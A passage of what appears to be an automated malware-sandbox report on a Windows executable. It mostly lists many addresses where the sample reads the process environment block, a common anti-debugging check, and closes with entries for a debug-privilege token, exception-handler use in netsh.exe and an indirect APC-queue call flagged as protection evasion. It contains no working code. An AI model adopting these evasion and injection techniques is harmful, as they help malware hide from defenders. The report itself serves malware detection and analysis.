          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146B3D0 mov ecx, dword ptr fs:[00000030h]3_2_0146B3D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D33A5 mov eax, dword ptr fs:[00000030h]3_2_013D33A5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E33A0 mov eax, dword ptr fs:[00000030h]3_2_013E33A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E33A0 mov eax, dword ptr fs:[00000030h]3_2_013E33A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F3E6 mov eax, dword ptr fs:[00000030h]3_2_0146F3E6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A8397 mov eax, dword ptr fs:[00000030h]3_2_013A8397
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A8397 mov eax, dword ptr fs:[00000030h]3_2_013A8397
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A8397 mov eax, dword ptr fs:[00000030h]3_2_013A8397
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE388 mov eax, dword ptr fs:[00000030h]3_2_013AE388
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE388 mov eax, dword ptr fs:[00000030h]3_2_013AE388
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE388 mov eax, dword ptr fs:[00000030h]3_2_013AE388
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D438F mov eax, dword ptr fs:[00000030h]3_2_013D438F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D438F mov eax, dword ptr fs:[00000030h]3_2_013D438F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014853FC mov eax, dword ptr fs:[00000030h]3_2_014853FC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E63FF mov eax, dword ptr fs:[00000030h]3_2_013E63FF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE3F0 mov eax, dword ptr fs:[00000030h]3_2_013CE3F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE3F0 mov eax, dword ptr fs:[00000030h]3_2_013CE3F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE3F0 mov eax, dword ptr fs:[00000030h]3_2_013CE3F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0148539D mov eax, dword ptr fs:[00000030h]3_2_0148539D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0140739A mov eax, dword ptr fs:[00000030h]3_2_0140739A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0140739A mov eax, dword ptr fs:[00000030h]3_2_0140739A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B83C0 mov eax, dword ptr fs:[00000030h]3_2_013B83C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B83C0 mov eax, dword ptr fs:[00000030h]3_2_013B83C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B83C0 mov eax, dword ptr fs:[00000030h]3_2_013B83C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B83C0 mov eax, dword ptr fs:[00000030h]3_2_013B83C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01438243 mov eax, dword ptr fs:[00000030h]3_2_01438243
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01438243 mov ecx, dword ptr fs:[00000030h]3_2_01438243
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A823B mov eax, dword ptr fs:[00000030h]3_2_013A823B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146B256 mov eax, dword ptr fs:[00000030h]3_2_0146B256
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146B256 mov eax, dword ptr fs:[00000030h]3_2_0146B256
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147D26B mov eax, dword ptr fs:[00000030h]3_2_0147D26B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147D26B mov eax, dword ptr fs:[00000030h]3_2_0147D26B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E7208 mov eax, dword ptr fs:[00000030h]3_2_013E7208
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E7208 mov eax, dword ptr fs:[00000030h]3_2_013E7208
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D9274 mov eax, dword ptr fs:[00000030h]3_2_013D9274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F1270 mov eax, dword ptr fs:[00000030h]3_2_013F1270
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F1270 mov eax, dword ptr fs:[00000030h]3_2_013F1270
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A826B mov eax, dword ptr fs:[00000030h]3_2_013A826B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B4260 mov eax, dword ptr fs:[00000030h]3_2_013B4260
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B4260 mov eax, dword ptr fs:[00000030h]3_2_013B4260
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B4260 mov eax, dword ptr fs:[00000030h]3_2_013B4260
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B6259 mov eax, dword ptr fs:[00000030h]3_2_013B6259
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA250 mov eax, dword ptr fs:[00000030h]3_2_013AA250
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485227 mov eax, dword ptr fs:[00000030h]3_2_01485227
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E724D mov eax, dword ptr fs:[00000030h]3_2_013E724D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9240 mov eax, dword ptr fs:[00000030h]3_2_013A9240
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9240 mov eax, dword ptr fs:[00000030h]3_2_013A9240
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02A0 mov eax, dword ptr fs:[00000030h]3_2_013C02A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02A0 mov eax, dword ptr fs:[00000030h]3_2_013C02A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A0 mov eax, dword ptr fs:[00000030h]3_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A0 mov eax, dword ptr fs:[00000030h]3_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A0 mov eax, dword ptr fs:[00000030h]3_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A0 mov eax, dword ptr fs:[00000030h]3_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E329E mov eax, dword ptr fs:[00000030h]3_2_013E329E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E329E mov eax, dword ptr fs:[00000030h]3_2_013E329E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014852E2 mov eax, dword ptr fs:[00000030h]3_2_014852E2
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE284 mov eax, dword ptr fs:[00000030h]3_2_013EE284
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE284 mov eax, dword ptr fs:[00000030h]3_2_013EE284
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F2F8 mov eax, dword ptr fs:[00000030h]3_2_0146F2F8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01430283 mov eax, dword ptr fs:[00000030h]3_2_01430283
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01430283 mov eax, dword ptr fs:[00000030h]3_2_01430283
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01430283 mov eax, dword ptr fs:[00000030h]3_2_01430283
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A92FF mov eax, dword ptr fs:[00000030h]3_2_013A92FF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485283 mov eax, dword ptr fs:[00000030h]3_2_01485283
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02E1 mov eax, dword ptr fs:[00000030h]3_2_013C02E1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02E1 mov eax, dword ptr fs:[00000030h]3_2_013C02E1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02E1 mov eax, dword ptr fs:[00000030h]3_2_013C02E1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014792A6 mov eax, dword ptr fs:[00000030h]3_2_014792A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014792A6 mov eax, dword ptr fs:[00000030h]3_2_014792A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014792A6 mov eax, dword ptr fs:[00000030h]3_2_014792A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014792A6 mov eax, dword ptr fs:[00000030h]3_2_014792A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov ecx, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014472A0 mov eax, dword ptr fs:[00000030h]3_2_014472A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014472A0 mov eax, dword ptr fs:[00000030h]3_2_014472A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB2D3 mov eax, dword ptr fs:[00000030h]3_2_013AB2D3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB2D3 mov eax, dword ptr fs:[00000030h]3_2_013AB2D3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB2D3 mov eax, dword ptr fs:[00000030h]3_2_013AB2D3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF2D0 mov eax, dword ptr fs:[00000030h]3_2_013DF2D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF2D0 mov eax, dword ptr fs:[00000030h]3_2_013DF2D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B92C5 mov eax, dword ptr fs:[00000030h]3_2_013B92C5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B92C5 mov eax, dword ptr fs:[00000030h]3_2_013B92C5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_014392BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_014392BC mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013DE53E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013C0535 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013ED530 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013BD534 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013E7505 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013E7505 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_01446500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_01484500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013EB570 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013E656A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013AB562 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0145F525 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0146B52F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013B8550 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_01485537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_014855C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013D45B1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0142D5D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0142D5D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013D15A9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_014835D7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013EE59C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013A758F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013E4588 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013B2582 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013B2582 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013D15F4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013EC5ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0143B594 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013B25E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_014305A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013D95DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013B65D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013EA5D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013EE5CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0144D5B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0146F5BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_014435BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013E55C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0146F453 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013AE420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013AC427 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0143C460 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013D340D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0148547F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013E8402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013DA470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_01437410 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013B1460 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013CF460 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_01436420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_01564068 GetProcessHeap,HeapFree
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_015696E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_01569930 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | NtQueueApcThread: Indirect: 0x131A4F2
